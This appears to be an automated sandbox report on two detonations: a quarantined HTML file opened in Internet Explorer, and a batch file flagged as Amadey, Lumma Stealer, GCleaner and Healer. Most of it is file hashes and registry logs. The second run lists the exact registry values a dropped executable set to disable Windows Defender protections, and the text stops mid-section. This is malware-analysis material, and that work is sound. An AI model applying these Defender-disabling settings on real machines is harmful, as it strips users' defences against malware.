SHA1 bd2b01012cffdabcaa6f059541fe9ea7f11384a4
SHA256 7a465fc28422c4fb7b7c9be0cd0c1206d27125c5e5e5a2a2550c39fc8c5c3259
SHA512 8b86dc7e135b3aecca47a5b7bcbd686dc1e4ffe3965fbf28ba642baf79a52179839f7dc99a01eb3fea56da03307f0eda76adb1e05c01c27fcffbe5cd206ba529

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f1e6713e21722585f20a72156821fe65
SHA1 59ae935907d31d499fb108fd2359af8cb06b2e9b
SHA256 823214a6bfa6db8106f2524ecb3274889bf89ea83386c981d2b1764412be5d5c
SHA512 0f9a75caefa1fa071164db5d6dd687db24da21335de726fa475e2af11f2f46d7a8dd76d5e6ce9abd9d4bd22cb59f0f67bab6c7f0c4de94e1057aad6ddf311719

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 97ae1723e39bcda82471a3cab7127be1
SHA1 bafdaf4e77f4c0f5ece718b8dc209ac7f0b06e42
SHA256 eee612fdd98ed46a1e5889436cc6e8dcdfc03ecd4575c46c4a1db4e552eec371
SHA512 6f79074510de761ed3e21ab0efd6e1363ab71f1858612a8ad734933e72ddd6ec491487a20d6409c4cffae375f808558b0a1fd722ffa0dbe159b68aaa77c17de9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8dc3f67398eb43df1e51f513be4a92b2
SHA1 531d94b27e135c9d67bcd59efd79167bd3346e86
SHA256 5506d30c103b9e1b7bc4510f739c7b42c359005ee86099ab104939d09cc2a83a
SHA512 d1a2bcf03939f01fb28c5e8b97481b2214fd5ea032efc1ec000b661bb17b877ce5c3b178934f14da343d5bc4c43c9771669800b794302c7530748704e391a53a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 76c24f092019abfe01a203e328239f55
SHA1 f3a85c3b0f53f0ba32d95e8e739fcaa9a334ddb9
SHA256 a45856b3456ed9f74abbacf0758309f23359b2c2f084c912799ec6226e4be3fe
SHA512 745902caeccd0e8fcbcb68ed106a287ae0786a350d402a2b9d53c9e53057e4042efffa5bdac9113cfb58479bcfd97d6fbba854b0ed06cd28f436ae9ef60a37fc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 eec08436a04b0e759af6e53a65baae0c
SHA1 3b77d348bf46183ead899d6713f9db3b8e29e267
SHA256 e780e40ba373736256d154c6d22635e069d5c213d2c808b1e077825b7d4f4548
SHA512 64428f9960e673b5f8c7a203824a527c4ba92866b0da916af7dbbcc55b9c39f8e20940e0f23c2b5c9d1dd4ceae954c2c758fb790634f5671328167b29a5eda73

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 31e7ff7e01cddb199dae6453e81243b0
SHA1 c25c50aaa020687733449c8065c710bb038d6cc3
SHA256 57100b4f465a59f9bde56dc665230d987ad3c081dc6b803e2525db134df617f1
SHA512 f171760c36b3bc06c6471e0c9a1294bb4b28e880f1abecd78f50802ab576bd6d3c0f635c6430231e2caecfcc0b9373eed02441abab347fd411c61b9a4a669b7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e0dae95e4c218c26aee833e6c60f50bd
SHA1 1eb15a29a9b63b1dd8510acc96281e721f491ae8
SHA256 137bf9120286fff62f98c71139269a56d67639590e4114bad22600dafa9c1226
SHA512 1833ee1231a9f06bdeee4215f1ee2751d94dd854823625a44ea211766bab4676dd9d66741214b63e6403e712c78fb454c8bc17216cb068fda6a0e4a2faabed00

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bed040b42219d6da980a7ce2dcc75480
SHA1 bf0a51b22935f974c9d77170b738b9d91d280e07
SHA256 7cfd73eb18cf7e441338a99ebedc71f3bc7f946a59a3249c5f9cb4a6edb64368
SHA512 2c9ef94b902fcc4d08439a30da157df52b0f2ca16e877dcdaa222d68241beb6f4608c662b41401426823f85e4ea63e1f6285c2401f2c105fba976dd216526778

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de7092dae5f90cb6a961e732411d2d76
SHA1 c4c0baeefad311aeb9ca9d430dedbd1a530b64e2
SHA256 906670016d935dfdc15d61f7c079b2558aa84f883fe2dc513721a78d6d0e341c
SHA512 afabfd43b7d82b447385bc9b107ed8e6202fb83bcbab65dc8be6c2f6b6a20835b10a234a13665f5e97839d6e85559992e45a229311e83bb1b18e058053213582

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 18ebcb25ae5433bf7fce20ad724af886
SHA1 faf429d0e50935c1e1ad02dac1da44c2580ecc4a
SHA256 94395c6e28b721d5509f6b169e0490ea6afe521a281ed30c6d362577fc93f05a
SHA512 4c6a2926d9a2a2727e82efef492aa95eb20640e899575a1e89823dff90f68b1838bdc7e7da60eda477e7a9f27c771e93d434aa68229b2b0988188d236808ea74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 940f42480acf1c73d4762352a9fdf251
SHA1 1f4937bfd70180eab1ffe536388bbba2cb214f49
SHA256 3c5666a9f04b73e63cc648c538a8838c8317db39f7397cee06932efef7f9b60d
SHA512 078eacd6b6296d727bbb75ed4d64a6f0dbae445386e36f5199ed01d78a54b50be142fd2868977ea83b1e3bb38ae520b44272130c155a444fd1fc2cc24cc63df3

Analysis: behavioral11

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win7-20240903-en

Max time kernel

132s

Max time network

128s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{D5157C31-F49B-11EF-AC61-4E0B11BE40FD} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 109b97a9a888db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5b2a80a52aa2e43a57d83b55b7203ac0000000002000000000010660000000100002000000019b7c78930157bf89244df2655d2b6e16ea56ec28b364881fcda1eca3db91322000000000e8000000002000020000000bdfabfae1c045d858767bf0d50592166652dc92b25edbaacb08343286094968b90000000d2c8d9f874c296a6be9a7dcdfa8c6afbfa8ca888651df72bedf87b35a57cef95266bfc2c7a9cb4bc8276f33f35147c6ffd2c4880f11ec7be5801a98c8198c53802e2cd0ccbe37de8f7f29aba422daa6c5ca39fb2a9845a6b0bde6d0a2026f722be2a8208f86a4cc639df6fa943d7966d05322b84658659e338852ce2a8088ad9598884f983e6aa1bc23a1ec5d63ca70e40000000300bbb83f438abb41cacfe18bcdc965c9591d41307c9353b28974b20f8306e73394a196d5d6efcbb863d9063e31e2251b42c997d0da58d505c253d0ca67a98fc C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446775428" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c5b2a80a52aa2e43a57d83b55b7203ac0000000002000000000010660000000100002000000015adaa62d5694351fcbd003c87a9c083c6f94f9c9bc0f1b4df4d5b180cb729d2000000000e80000000020000200000003d11fb97aea5ccb6b3cf0a82c18b97d5e6c0b735be73a9fdd2ea905ee72c83a020000000618ffd5ca9a65aa5929f69b52b7ccf2f13a24483351521b6c659a5f6db350e4840000000691ce2491dca97169feecb4f0d2f85085ccee209c2173fe04d38144a6b9d392b834b1a53c1209ea638c2dbedb474b6221213b602cdacbbb4714fbe74898a2c6a C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\IxZcQMy.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2600 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabDC9.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarE6C.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 006032553d16c7f3d1dde4912243e282
SHA1 6e85013d6cd34ea6b5c22766beb947d63462309e
SHA256 66b5b5d3c6704f9c51295799dd3d602aecef8c29d14384184e63674723706e3c
SHA512 fe7914a94553c4e43b82ad4673d6c67f83a4df3f1c8884f77c1b4c5bda56ea2f9b86f0281b33cb66d215dc70c087c66088e91651197394fee760f4e3e5ee3332

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0a73e365efe65df08438b1d983ff2bfb
SHA1 6c7b0d680e958c6fb30c5d432a543ed78c1b54ce
SHA256 bc39a89f5ce219b464fc0d43f3c0ef03e54ab6b46882e590c613ccde828992ca
SHA512 28f1b26d8324713123477b0850e7920e2350f3cf8c474a3ad2ed24f8038389b36b3ea87ca59b4a796e6ce36976605a59949e6cd83c9f179a2c5f044055ef8930

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fa07feff9b21af201c6c6d788777b1a5
SHA1 6062142c3aeeb02e9349e0b8135a46c409896865
SHA256 d29d47e7acb5dc97e315c0c457fff6afb9133c1f82ef39ebfdc98ba34167be54
SHA512 034723fe6bd479b4a16f8fc496f6d277a4af536cf8fcfd0c5d088c3d0b2b96f677ef65255447ac8b8bd7a5eaa52df8c1154909e8809febe1e78469e278f172e6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1aaf1cf7285149275cc98f9d5130e0e5
SHA1 3873c4deae6b3f862c01ddd289b6bbe899ff5a8a
SHA256 97047a4c9d2a19ba86240f8a629963d71b237e255fd85b17729de27c19df9a50
SHA512 54d5072a1759ff3ca06fca8a9728f3963c767ef2ac26708c6bf484bdfcffa4fd88d3f4576d2113a0c890a3b846c2ac387d683e8c244447425569bbaa68d1cd0d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65fadbabba9619586741dad9a6d076ef
SHA1 99e1beb93c748200d6e3df10b0a4a9d22b4e75ab
SHA256 038a909b2aaef85e88514029eb14af012801f0595b2fb5e95b1e0aca7376c8b3
SHA512 aee1c83ac7b49f174d280013cc841bcc911f877e211db0fcb8f864ffc1d9124ffb0ba98f4ed83e6763f777b43ce5540b190eaf3bceedb93962bdde427b9efd47

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d040a546d52d3c824921771cad99b3f7
SHA1 f5c8225fdf89a41d02a2459cdd4bd4cb8984e6f1
SHA256 6d64ee0d16da5f1013ec244a51afcaec1ff02db9b2a67540fa22b60d5b46d1d7
SHA512 5708800b8786aece8a33baa4ef73543d773e762a2159aa679af9c6bdc80483b1e4abdecc227eda7964c6218c733a4b3769a93b11b3e3b5799f117e68f48dda5a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b66bd8e5494be975f7dd85ed9102820b
SHA1 6d756f2184b8cb2e6329927faf780c7697f14b73
SHA256 47bed921c3d3fb27a3bacc43c54a5c1957cc7d49433b90a522b378bac9beaf80
SHA512 8ea1a8390b3ba96ce0f8450d963ec97ca38f3c3be0bbf12a22a89e4d9b6326df74f423acde00fe4514f03e4a7458e1c8694790bf2168ae3b88a8c5cd5ff2081c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fb7e80bd8b9982bb1b8c702ba9bdf5a5
SHA1 cda0e409bfee0fc3d3491b258da4e1fe7f7b1052
SHA256 af91619f553bc6a41419fc1d013aa16c63ead3535c0b950e91fb6bc6af6e99e1
SHA512 495f587a1bd252cbcfddfc7b0693629d55161cc5168ebef48d680c657e0248f6ec39bde7e4cc643907bfa210071748e019c5b587c3fd0a60a0824e206e76a9ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 675583affb5fcb4f9fc69dca00614c02
SHA1 de2931ec2ce3ab4126b2e8cc938d8a36da54035d
SHA256 23d3ef9d0529029b276106e90d95f33ffadecc2164944fb434f798ac438087b0
SHA512 6434fc1cb37c82da22e41094b31d6a355a5dfe26bb081f6b5fe209accaa2212f38ae8c9b182928d26770e9ef5082972c04fdb4b989be07570c33fa0f71801abd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 495270d9e72245bbfa3d1a94dbf29679
SHA1 996e033bc4e14fef649af6e37b13a39ab4d8db3d
SHA256 0c014d3fb24c0617b4e86f0148940107ce826bb370e67ac813901d57a63ba87b
SHA512 44e08151995ddefe8275d097ec4032f9fed8e6ae0f5bfb5b680c2832d86b81c074ed2df2f147f72e291ba4685791ce2f523e543d56e95caabc0e50cdded40346

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9155844e9e4862c181537f5187671c23
SHA1 a725975d9c2c255417ffbaee8a84802afc5b882a
SHA256 9f68cfaf26e2e40f8f759c4c03a3701de2b0f344025bc6c10fb847026292fb82
SHA512 bb252d08cd36270172cc61ff30ed8d833acf58114283a500932a984b09fc702f7307a2478d91dc7fca9a54a0afe406b749359e3f84c60e8afdc0c6dde6ecb277

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 76dce8d4306f31dbe6df3dd63edee996
SHA1 3463ab36abe3c7e82ef55b9c871ac64c83686be7
SHA256 b5cb404119cb0bcc67f21aefcc25b3dff5ef9861fc140ca71c3c1fff8420146e
SHA512 f46056b8c2604d26678e7bd4e90767e0ea5493c245d30129ecf7027fcb2f67a08dfc3e7d1cbadaac4ab652536cb3ba192b6ea2d1f207bebf0d51c45a7c93f551

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 734c70c8d39f9a7133be897edbe1ebe1
SHA1 0926f55e11029babe1afab48c6e9d549f805bb52
SHA256 f287a014dbb68f8e5bec993e4138149bbb47e95558eb9bf50257aca2408a9d3c
SHA512 30e5d72f606b52422355607e530687c912c4337c260ef74de6a6f4fb7c0908f5f3b40d658f36e280c4b84d4b4eb8698ae43b0fd9f37050dfb168243c98d0ee41

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5da793e013328a9629253309e7c10e7
SHA1 14cfac7283a48b3efe5fcc5afb4e8b5a6b799439
SHA256 39642798f44ee0f64e1dd5b167b57b4b884c89189e8fe7c19252db87b4819249
SHA512 98c0d7140657a5e258d826f7b906dc0520a6564f59ad85829b628759e099d1fd277ac2e1a96c0f90c0201f3cbbd12f8b437aaf5400c5ee63cb723757c7f31be6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5979e2a5fee3cd9fce87fdf34bfd4931
SHA1 dbb96228d2f0663027e15499c2e9c16107fe5cc8
SHA256 8a59eda3b5a6122cd7ec8e56254fe1f57436ee08b83543c74959417cba37485d
SHA512 63d82c3b315948e40dc4763bce53b07141903b8e9ce131e58ac3508b4e8bfab289ac026d62840e4a7f6ac82d699e2550d863440ee46cc85860c06cc5a5d1a252

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 71133a6a938f6b952822e4e958aec0a9
SHA1 c70d0a8d3c8d2fff4ec2b4bb90225b4b095c122b
SHA256 270ddf0b70158afe1eb8e21976aeeb894e39f9835cf51a7d0c6f1042969f008b
SHA512 73c80ab670a768cda6ac10306bce58ea67863d908945d1831919cc863cc91adeb35506675801e19916481b04de7fc0bff75e4cf4bbb9508bc9d7a6807c9f2c11

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 13da8a75d470e27887a23b909156b6d8
SHA1 a0ee0ecb43f7855a6acea30baa5c95c8ba4d051e
SHA256 0d5f7cf09d43befb672ac50c615c7bae11612a4c71c51b700595875aaee7e44b
SHA512 ac024fb711e1ff31e8090ab36d13227252d5eda4e49866374336f384e22f884ab023e0b25df5bae7ab44eeff963afa8ef725b249f6f0c1935da879963a11683a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7090503afb5e2d15b2f6be2e24e42af0
SHA1 028fa92fa3e9848745479f06ea2f7cf8a4a61edd
SHA256 0b64d9056fad493fc079563552490f84c55650e58e138a5a0b0af835bbd33f31
SHA512 103e0d6e69554b3582ed5b7ba014aba64da970e9da60386424e3e90de205c5a2bd5052ed7a72ea897c97256078acb611432991ccd8789a6e245ace3cc114c6df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 86e42ace8a8c689dbcd8c949438e403a
SHA1 0da7bbad1b00a98788a801f2540992c5357061d1
SHA256 c1ebbcb6656406081047c6a40ebac12991faf3a90104a38e69362d7beb5b4f8a
SHA512 1b0f1613f06300b9a52b314a96bb2bf984e9735bf8aee19f105c8d078773295f49e70bc6b24e64996b6cd8f2addafd1e7f42a2260c393ef9e58a463b3afe9bd1

Analysis: behavioral14

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\quarantine\am_no.bat"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
